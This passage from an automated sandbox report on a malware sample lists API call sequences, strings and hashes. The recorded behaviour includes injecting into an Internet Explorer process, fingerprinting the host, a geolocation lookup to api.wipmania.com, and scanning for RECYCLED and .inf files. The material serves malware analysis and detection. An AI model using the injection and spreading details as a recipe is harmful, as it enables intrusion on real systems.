                                                                  • GetNativeSystemInfo.KERNEL32(?,00000000,kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,00404D5C), ref: 00404007
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoNativeSystem
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 1721193555-192647395

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNEL32(?,00000000,kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,00364D5C), ref: 00364007
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoNativeSystem
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 1721193555-192647395
                                                                  APIs
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00449E78,00000026,00000001), ref: 004068BB
                                                                  • PathAppendW.SHLWAPI(00449E78,Internet Explorer\iexplore.exe), ref: 004068D0
                                                                  Strings
                                                                  • Internet Explorer\iexplore.exe, xrefs: 004068C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendFolderSpecial
                                                                  • String ID: Internet Explorer\iexplore.exe
                                                                  • API String ID: 2921508639-3330628412
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(0000047A,00000000,00000000,?,?,004057DF,?,00000000,00000000,(mA,?,?,?,?), ref: 00404430
                                                                  • GetLastError.KERNEL32(?,004057DF,?,00000000,00000000,(mA,?,?,?,?,?,?,?,?,?,00406010), ref: 0040443C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastOpenProcess
                                                                  • String ID:
                                                                  • API String ID: 919517065-0
                                                                  • Opcode ID: fa21c6a546f7665fcd9ed43f9efed41023edd3376a29bcc8ba8710a23aa8e6cc
                                                                  • Instruction ID: 0bc3cb10323a7717dc5adc9e31d89cd4ea32d10fdc1a18813f8fb21e42cac110
                                                                  • Opcode Fuzzy Hash: fa21c6a546f7665fcd9ed43f9efed41023edd3376a29bcc8ba8710a23aa8e6cc
                                                                  • Instruction Fuzzy Hash: E2F089766401146BD7106BB5BC05EAB779CDBC4395B044036FB0CD3750D5749900C6A9
                                                                  APIs
                                                                    • Part of subcall function 004068B0: SHGetSpecialFolderPathW.SHELL32(00000000,00449E78,00000026,00000001), ref: 004068BB
                                                                  • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000010,00000000,00000000,00000044,?), ref: 0040A9ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFolderPathProcessSpecial
                                                                  • String ID: D
                                                                  • API String ID: 2112413627-2746444292
                                                                  • Opcode ID: 835663ffea5eee61987b87af985e6251e3cfc9ab47c548749ea0a7200375bfe3
                                                                  • Instruction ID: 2230c3a86171d276420a58e3022d5c119255fdd01a2dfc7308d6bdfabee464bf
                                                                  • Opcode Fuzzy Hash: 835663ffea5eee61987b87af985e6251e3cfc9ab47c548749ea0a7200375bfe3
                                                                  • Instruction Fuzzy Hash: 5501A272A4031876EB20DAD58C02FEF7B2C9B04B14F14415AFB097B1C5EAB969548399
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403819
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403820
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocateProcess
                                                                  • String ID:
                                                                  • API String ID: 1357844191-0
                                                                  • Opcode ID: baacf28b722c80f1d97f843805acf95dbcbf5d56b1c562bccd72c9ce7d042db9
                                                                  • Instruction ID: a45d09a1cc6a3363d10043362d83d70e5a190bee85998ff93397d4509dba2002
                                                                  • Opcode Fuzzy Hash: baacf28b722c80f1d97f843805acf95dbcbf5d56b1c562bccd72c9ce7d042db9
                                                                  • Instruction Fuzzy Hash: B6C09B75144708BBE7005BF4EC0DFD5775CD70C612F408010FB1DC6260C671A4404765
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00402D43,?,00000100,?,(mA,?,?,00405730,?,00008000,?,00000000), ref: 0040384F
                                                                  • HeapReAlloc.KERNEL32(00000000,?,00402D43,?,00000100,?,(mA,?,?,00405730,?,00008000,?,00000000,00000000,?), ref: 00403856
                                                                    • Part of subcall function 00403810: GetProcessHeap.KERNEL32(00000000,00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403819
                                                                    • Part of subcall function 00403810: RtlAllocateHeap.NTDLL(00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403820
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocAllocate
                                                                  • String ID:
                                                                  • API String ID: 1154092256-0
                                                                  • Opcode ID: 6bd858bd068ee9d502431d5df6c01d659be59e0546fa1d939306a6d2d7cd13d1
                                                                  • Instruction ID: 59b5348fdb67c635b3c04655c960773e447a90c549b0dc0aa948b3716d5f6312
                                                                  • Opcode Fuzzy Hash: 6bd858bd068ee9d502431d5df6c01d659be59e0546fa1d939306a6d2d7cd13d1
                                                                  • Instruction Fuzzy Hash: 20D05BB65002087BEF00AFE4FC49EAA3B9CDB48615F44C065FB0DC7650D635E9008755
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,0040428C,?,0040428C,00000000), ref: 004037F9
                                                                  • HeapFree.KERNEL32(00000000,?,0040428C), ref: 00403800
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$FreeProcess
                                                                  • String ID:
                                                                  • API String ID: 3859560861-0
                                                                  • Opcode ID: 38296f158267b1ebc2d54f92307be93bf0282fd4a93306e7a804a0f77be8d180
                                                                  • Instruction ID: 9b6b654b7b719752d2f106a16efdcbfd3e8252ceaa65f6ec648e1aaeb866a5ce
                                                                  • Opcode Fuzzy Hash: 38296f158267b1ebc2d54f92307be93bf0282fd4a93306e7a804a0f77be8d180
                                                                  • Instruction Fuzzy Hash: 7DC09B7514430CBBDB005BE4EC0DFD5775CE70C641F40C010F70DC6160C671A4004765
                                                                  APIs
                                                                  • RtlInitializeCriticalSection.NTDLL(EDB8830C,00010000,EDB88320), ref: 004030EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalInitializeSection
                                                                  • String ID:
                                                                  • API String ID: 32694325-0
                                                                  • Opcode ID: 1ec5181adca8729c0b4d054fe9820a29ef9486c1db9cb2112205f76210c3a441
                                                                  • Instruction ID: f882fd944f5205b9f6397f97525e7b153576b9ce51f1a3dc64d4837ac45731b1
                                                                  • Opcode Fuzzy Hash: 1ec5181adca8729c0b4d054fe9820a29ef9486c1db9cb2112205f76210c3a441
                                                                  • Instruction Fuzzy Hash: 88E04F31501725ABDB205F189C02B8B7B9CAF04751F044036FD08A7782E774EA0047D8
                                                                  APIs
                                                                  • IsWow64Process.KERNELBASE(00000000,00000000,?,?,00404309,00000000,00000000,00000000,00000000), ref: 004042B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessWow64
                                                                  • String ID:
                                                                  • API String ID: 2092917072-0
                                                                  • Opcode ID: 22b2903508e7e7fa1c50625dbd83016fe9164760df05acc8bbb1288eadc8f59e
                                                                  • Instruction ID: 2da779ddd16944dc38780d38c887f2d19e27236ab7e8ad125095d7b4c023789d
                                                                  • Opcode Fuzzy Hash: 22b2903508e7e7fa1c50625dbd83016fe9164760df05acc8bbb1288eadc8f59e
                                                                  • Instruction Fuzzy Hash: 5AE08CB072021CABDB30CB90DC04BAA73ACD740349F0002FEBE0892690E63ADE44CB94
                                                                  APIs
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00449A68,0000001A,00000001), ref: 0040685B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FolderPathSpecial
                                                                  • String ID:
                                                                  • API String ID: 994120019-0
                                                                  • Opcode ID: 719606b9710c54ecf9254484d1c63c70ec4c7ebb7d3140fe275e23f379cb05b4
                                                                  • Instruction ID: dec42c56a20302e498460b79d113f6e88d44876573d08d8c81d581d4537f89bd
                                                                  • Opcode Fuzzy Hash: 719606b9710c54ecf9254484d1c63c70ec4c7ebb7d3140fe275e23f379cb05b4
                                                                  • Instruction Fuzzy Hash: 3BB092313F434521FA101A788C07FC121486325F03F9082617282F80E0C2DC8D80A20B
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040B4A2
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407401
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407419
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 00407431
                                                                    • Part of subcall function 004073E0: _snprintf.MSVCRT ref: 00407449
                                                                    • Part of subcall function 004073E0: _vsnprintf.MSVCRT ref: 0040746B
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 0040747A
                                                                  • lstrcpyA.KERNEL32(?,00411335), ref: 0040B51A
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B536
                                                                  • GetVersionExA.KERNEL32(?), ref: 0040B550
                                                                  • lstrcpyA.KERNEL32(?,ERR), ref: 0040B5F5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B60D
                                                                  • strstr.MSVCRT ref: 0040B641
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040B650
                                                                  • lstrlenA.KERNEL32(-00000004), ref: 0040B65F
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 0040B67D
                                                                  • lstrcmpA.KERNEL32(-00000004,00412BE4), ref: 0040B6A8
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 0040B6C5
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0040B719
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B74A
                                                                    • Part of subcall function 00401BA0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00401BC5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B75B
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B76E
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B781
                                                                  • _snprintf.MSVCRT ref: 0040B796
                                                                  • _snprintf.MSVCRT ref: 0040B7AB
                                                                  • lstrcpyA.KERNEL32(?,00412C0C), ref: 0040B7CD
                                                                  • _snprintf.MSVCRT ref: 0040B7FC
                                                                  • _snprintf.MSVCRT ref: 0040B863
                                                                  • _snprintf.MSVCRT ref: 0040B878
                                                                  • lstrcpyA.KERNEL32(?,00412C0C), ref: 0040B89A
                                                                  • _snprintf.MSVCRT ref: 0040B8C9
                                                                  • _snprintf.MSVCRT ref: 0040B8E0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040B8F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$AllocHeap$lstrcpy$lstrlen$memset$InfoLocaleTime$??3@FileSystemVersion_vsnprintflstrcmpstrstr
                                                                  • String ID: 2K3$2K8$<br>$ERR$VIS$[%s{%s%s{%s$admin$http://api.wipmania.com/$isadmin$n%s[%s{%s%s{%s
                                                                  • API String ID: 124843797-3058427118
                                                                  • Opcode ID: 5285a643bed9aead735775b7b57751fab33f7591493ea2bf5bbeeb1044d9239c
                                                                  • Instruction ID: 0949af502ffcd9305bdd3bfb05b668ef187342c133c2638009f109ee02911516
                                                                  • Opcode Fuzzy Hash: 5285a643bed9aead735775b7b57751fab33f7591493ea2bf5bbeeb1044d9239c
                                                                  • Instruction Fuzzy Hash: 6CC161B1A44305BBD724DF51CC81FA77378EB44708F10896EF246A62D0E7B8E9848B9D
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036B4A2
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367401
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367419
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 00367431
                                                                    • Part of subcall function 003673E0: _snprintf.MSVCRT ref: 00367449
                                                                    • Part of subcall function 003673E0: _vsnprintf.MSVCRT ref: 0036746B
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 0036747A
                                                                  • lstrcpyA.KERNEL32(?,00371335), ref: 0036B51A
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B536
                                                                  • GetVersionExA.KERNEL32(?), ref: 0036B550
                                                                  • lstrcpyA.KERNEL32(?,ERR), ref: 0036B5F5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B60D
                                                                  • strstr.MSVCRT ref: 0036B641
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036B650
                                                                  • lstrlenA.KERNEL32(-00000004), ref: 0036B65F
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 0036B67D
                                                                  • lstrcmpA.KERNEL32(-00000004,00372BE4), ref: 0036B6A8
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 0036B6C5
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0036B719
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B74A
                                                                    • Part of subcall function 00361BA0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00361BC5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B75B
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B76E
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B781
                                                                  • _snprintf.MSVCRT ref: 0036B796
                                                                  • _snprintf.MSVCRT ref: 0036B7AB
                                                                  • lstrcpyA.KERNEL32(?,00372C0C), ref: 0036B7CD
                                                                  • _snprintf.MSVCRT ref: 0036B7FC
                                                                  • _snprintf.MSVCRT ref: 0036B863
                                                                  • _snprintf.MSVCRT ref: 0036B878
                                                                  • lstrcpyA.KERNEL32(?,00372C0C), ref: 0036B89A
                                                                  • _snprintf.MSVCRT ref: 0036B8C9
                                                                  • _snprintf.MSVCRT ref: 0036B8E0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0036B8F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$AllocHeap$lstrcpy$lstrlen$memset$InfoLocaleTime$??3@FileSystemVersion_vsnprintflstrcmpstrstr
                                                                  • String ID: 2K3$2K8$<br>$ERR$VIS$[%s{%s%s{%s$admin$http://api.wipmania.com/$isadmin$n%s[%s{%s%s{%s
                                                                  • API String ID: 124843797-3058427118
                                                                  • Opcode ID: 38736b8b97e97289167f21de5f286e04aa3c963098bc85c7f20d7e79cd6cb2f5
                                                                  • Instruction ID: 46366e9af9fb6619ad18183ff048b9bfecb3083293a1614b67bec970f01eb473
                                                                  • Opcode Fuzzy Hash: 38736b8b97e97289167f21de5f286e04aa3c963098bc85c7f20d7e79cd6cb2f5
                                                                  • Instruction Fuzzy Hash: 08C173B1A40705ABD736DB94CC82EABB3BCAB54704F14C91CF346AB584D7B4E9848F61
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00401ECD
                                                                  • GetLastError.KERNEL32 ref: 00401EDA
                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00401EF5
                                                                  • GetLastError.KERNEL32 ref: 00401EFF
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00401F06
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AcquireCloseContextCreateCryptFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2213256293-0
                                                                  • Opcode ID: e4a31331d112a67bdcebc61a7cb6164f8bfe0d5aecb2f3aaefa7239b3fa62299
                                                                  • Instruction ID: 29da55e24c53a6960bedebd6ee296a713d47ef44fcd8d90534e508c4660d2c9c
                                                                  • Opcode Fuzzy Hash: e4a31331d112a67bdcebc61a7cb6164f8bfe0d5aecb2f3aaefa7239b3fa62299
                                                                  • Instruction Fuzzy Hash: B4517F76A00108BFDB109BE4EC88AFFBB7CEB49355F10856AFB05D2260D77589418B68
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00361ECD
                                                                  • GetLastError.KERNEL32 ref: 00361EDA
                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00361EF5
                                                                  • GetLastError.KERNEL32 ref: 00361EFF
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00361F06
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AcquireCloseContextCreateCryptFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2213256293-0
                                                                  • Opcode ID: ebc95cb986f6c52362ddbad91df948eed7d41a8fa27fc4a814110a9d9c953849
                                                                  • Instruction ID: 16ca4a358659dae24186af09ba0eb44380a43b38fe8e5e876fb44ca54a814f20
                                                                  • Opcode Fuzzy Hash: ebc95cb986f6c52362ddbad91df948eed7d41a8fa27fc4a814110a9d9c953849
                                                                  • Instruction Fuzzy Hash: A851B377A10108AFDB229FE9EC88EBFB77CFB48355F504599FA09D6240D73189818B60
                                                                  APIs
                                                                  • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 004053E7
                                                                  • OpenProcess.KERNEL32(0000047A,00000000,?), ref: 0040540E
                                                                  • NtQueryInformationProcess.NTDLL(00000000,0000001B,?,00000400,00000000), ref: 0040542F
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004056C0
                                                                    • Part of subcall function 00404900: WaitForSingleObject.KERNEL32(00407495,000000FF,?,00000000,756F59EB,?,00407495), ref: 00404939
                                                                    • Part of subcall function 00404900: ReleaseMutex.KERNEL32(?,?,00407495), ref: 0040497C
                                                                  • InterlockedCompareExchange.KERNEL32(00000000,00000000), ref: 004054AB
                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040552F
                                                                  • WriteProcessMemory.KERNEL32 ref: 0040554E
                                                                  • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00405573
                                                                  • ReadProcessMemory.KERNEL32 ref: 004055A0
                                                                  • ReadProcessMemory.KERNEL32 ref: 004055C4
                                                                  • ReadProcessMemory.KERNEL32 ref: 004055EC
                                                                  • ReadProcessMemory.KERNEL32 ref: 00405618
                                                                    • Part of subcall function 00404160: VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000040,00000000,?,?,?), ref: 00404192
                                                                    • Part of subcall function 00404160: WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0040424F
                                                                  • WriteProcessMemory.KERNEL32 ref: 004056B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Memory$Read$InformationQueryWrite$AllocVirtual$CloseCompareExchangeHandleInterlockedMutexObjectOpenReleaseSingleThreadWait
                                                                  • String ID: STFU$zC$zC
                                                                  • API String ID: 992379172-23431524
                                                                  • Opcode ID: b939856e6fbf4f50ad2b13fa2647fb61fac06f8d783d1b4027c565cdf868c979
                                                                  • Instruction ID: df0844a3ba5e5749fd7180ba75f548f14b80aef18a41645c055a17c66c8f8887
                                                                  • Opcode Fuzzy Hash: b939856e6fbf4f50ad2b13fa2647fb61fac06f8d783d1b4027c565cdf868c979
                                                                  • Instruction Fuzzy Hash: F79173B5901209AFEB10DF94CC41FEF7778EB88704F10856AE605AB290E7759E41CF68
                                                                  APIs
                                                                  • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 003653E7
                                                                  • OpenProcess.KERNEL32(0000047A,00000000,?), ref: 0036540E
                                                                  • NtQueryInformationProcess.NTDLL(00000000,0000001B,?,00000400,00000000), ref: 0036542F
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003656C0
                                                                    • Part of subcall function 00364900: WaitForSingleObject.KERNEL32(00367495,000000FF,?,00000000,756F59EB,?,00367495), ref: 00364939
                                                                    • Part of subcall function 00364900: ReleaseMutex.KERNEL32(?,?,00367495), ref: 0036497C
                                                                  • InterlockedCompareExchange.KERNEL32(00000000,00000000), ref: 003654AB
                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0036552F
                                                                  • WriteProcessMemory.KERNEL32 ref: 0036554E
                                                                  • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00365573
                                                                  • ReadProcessMemory.KERNEL32 ref: 003655A0
                                                                  • ReadProcessMemory.KERNEL32 ref: 003655C4
                                                                  • ReadProcessMemory.KERNEL32 ref: 003655EC
                                                                  • ReadProcessMemory.KERNEL32 ref: 00365618
                                                                    • Part of subcall function 00364160: VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040,00000000,?,?,?), ref: 00364192
                                                                    • Part of subcall function 00364160: WriteProcessMemory.KERNEL32 ref: 0036424F
                                                                  • WriteProcessMemory.KERNEL32 ref: 003656B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Memory$Read$InformationQueryWrite$AllocVirtual$CloseCompareExchangeHandleInterlockedMutexObjectOpenReleaseSingleThreadWait
                                                                  • String ID: STFU$z9$z9
                                                                  • API String ID: 992379172-4188904995
                                                                  • Opcode ID: b31939b989d118f630154e38c5391a898e8452d8c6b09e3eca08971324e6bc2f
                                                                  • Instruction ID: 9bc167182ce3e140ad545d3d5124f44752b8c29802b6adb94a676814882d6c75
                                                                  • Opcode Fuzzy Hash: b31939b989d118f630154e38c5391a898e8452d8c6b09e3eca08971324e6bc2f
                                                                  • Instruction Fuzzy Hash: 5F9170B5A01609AFDB11DF94CC81FEE77BCEB84700F508169E605AB284EB749E41CBA4
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040F150
                                                                  • memset.MSVCRT ref: 0040F168
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0040F17B
                                                                    • Part of subcall function 0040EDF0: memset.MSVCRT ref: 0040EE0E
                                                                    • Part of subcall function 0040EDF0: vsprintf.MSVCRT ref: 0040EE22
                                                                    • Part of subcall function 0040EDF0: PathAppendA.SHLWAPI(?,00000000), ref: 0040EE35
                                                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 0040F196
                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040F1AA
                                                                  • CoInitialize.OLE32(00000000), ref: 0040F1C2
                                                                  • _snprintf.MSVCRT ref: 0040F1E1
                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040F20C
                                                                  • strncmp.MSVCRT ref: 0040F22E
                                                                  • strstr.MSVCRT ref: 0040F246
                                                                  • _snprintf.MSVCRT ref: 0040F26B
                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040F290
                                                                  • FindClose.KERNEL32(?), ref: 0040F29E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Find$Filememset$Next_snprintf$AppendCloseCurrentDirectoryFirstInitializePathlstrcpystrncmpstrstrvsprintf
                                                                  • String ID: %s%s$.inf$RECYCLED
                                                                  • API String ID: 3870971729-188919753
                                                                  • Opcode ID: bd566a15def4f28c764169d26c68d832e88d6b2d9000b55ba9adc75dc1e1f3fb
                                                                  • Instruction ID: 063b9b5624f3e53f2b7c9015ed89a51c60917bf55f536b871253b52f4a03b6c8
                                                                  • Opcode Fuzzy Hash: bd566a15def4f28c764169d26c68d832e88d6b2d9000b55ba9adc75dc1e1f3fb
                                                                  • Instruction Fuzzy Hash: 7941A57594021CABCB20DB61DC85FEB777CEB58304F0445AAF908A2190E6B5AFC5CB64
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036F150
                                                                  • memset.MSVCRT ref: 0036F168
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0036F17B
                                                                    • Part of subcall function 0036EDF0: memset.MSVCRT ref: 0036EE0E
                                                                    • Part of subcall function 0036EDF0: vsprintf.MSVCRT ref: 0036EE22
                                                                    • Part of subcall function 0036EDF0: PathAppendA.SHLWAPI(?,00000000), ref: 0036EE35
                                                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 0036F196
                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0036F1AA
                                                                  • CoInitialize.OLE32(00000000), ref: 0036F1C2
                                                                  • _snprintf.MSVCRT ref: 0036F1E1
                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0036F20C
                                                                  • strncmp.MSVCRT ref: 0036F22E
                                                                  • strstr.MSVCRT ref: 0036F246
                                                                  • _snprintf.MSVCRT ref: 0036F26B
                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0036F290
                                                                  • FindClose.KERNEL32(?), ref: 0036F29E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
